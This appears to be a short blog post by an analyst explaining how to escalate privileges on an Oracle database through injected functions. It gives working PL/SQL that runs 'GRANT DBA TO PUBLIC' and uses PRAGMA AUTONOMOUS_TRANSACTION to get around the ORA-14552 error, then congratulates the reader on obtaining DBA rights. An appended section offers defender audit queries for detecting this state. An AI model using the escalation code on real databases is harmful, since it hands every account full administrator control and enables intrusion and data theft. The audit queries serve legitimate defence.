There are some limitations to injecting and running attacker-supplied functions. It appears we can perform only SELECT queries: if the injected function tries to execute DDL or DML statements, or anything that requires a COMMIT or ROLLBACK, the attempt fails with the error
ORA-14552: cannot perform a DDL, commit or rollback inside a query or DML
Example:
-- Called from inside a query, the DDL below fails with ORA-14552
CREATE OR REPLACE FUNCTION GET_DBA RETURN VARCHAR2 AUTHID CURRENT_USER
IS
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
END;
/
GRANT EXECUTE ON GET_DBA TO PUBLIC;
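It won't work, and you get the error described above.
Here is the solution.
We can achieve this with the help of PRAGMA AUTONOMOUS_TRANSACTION in a procedure or function. An autonomous transaction runs independently of the calling statement's transaction, so the commit that the DDL implies no longer happens inside the query.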
-- Same function, now declared as an autonomous transaction
CREATE OR REPLACE FUNCTION GET_DBA RETURN VARCHAR2 AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
END;
/
Congrats! You got the DBA privileges for the PUBLIC account.
Regards:
Manmohan Mishra
Analyst (AI)
Wipro Technologies
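
A defender-side check for the outcome described in this post, as an added example that is not part of the original post: audit queries over Oracle's standard data dictionary views. They assume a session that can read the DBA_* views and Oracle 12c or later (for DBA_USERS.ORACLE_MAINTAINED).

```sql
-- Added audit example; run as an account that can read the DBA_* views.

-- 1. Roles granted to PUBLIC. A DBA row here is the end state the post describes.
SELECT grantee, granted_role, admin_option
FROM   dba_role_privs
WHERE  grantee = 'PUBLIC'
ORDER  BY granted_role;

-- 2. Invoker-rights functions/procedures in non-Oracle schemas whose source
--    combines PRAGMA AUTONOMOUS_TRANSACTION with dynamic SQL, newest first.
SELECT p.owner, p.object_name, p.object_type, o.created, o.last_ddl_time
FROM   dba_procedures p
JOIN   dba_objects o
       ON  o.owner       = p.owner
       AND o.object_name = p.object_name
       AND o.object_type = p.object_type
JOIN   dba_users u
       ON  u.username = p.owner
WHERE  p.authid      = 'CURRENT_USER'
AND    p.object_type IN ('FUNCTION', 'PROCEDURE')
AND    u.oracle_maintained = 'N'            -- assumption: 12c or later
AND    EXISTS (SELECT 1 FROM dba_source s
               WHERE  s.owner = p.owner
               AND    s.name  = p.object_name
               AND    s.type  = p.object_type
               AND    UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%')
AND    EXISTS (SELECT 1 FROM dba_source s
               WHERE  s.owner = p.owner
               AND    s.name  = p.object_name
               AND    s.type  = p.object_type
               AND    UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%')
ORDER  BY o.last_ddl_time DESC;

-- 3. Who can create stored code at all. The technique needs this privilege,
--    so application accounts should not appear in the result.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
ORDER  BY grantee, privilege;
```

A DBA row from the first query can be removed with REVOKE DBA FROM PUBLIC, but objects and grants created while it was in place still need review. The second query matches on source text only, so wrapped or obfuscated PL/SQL will not appear in it.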
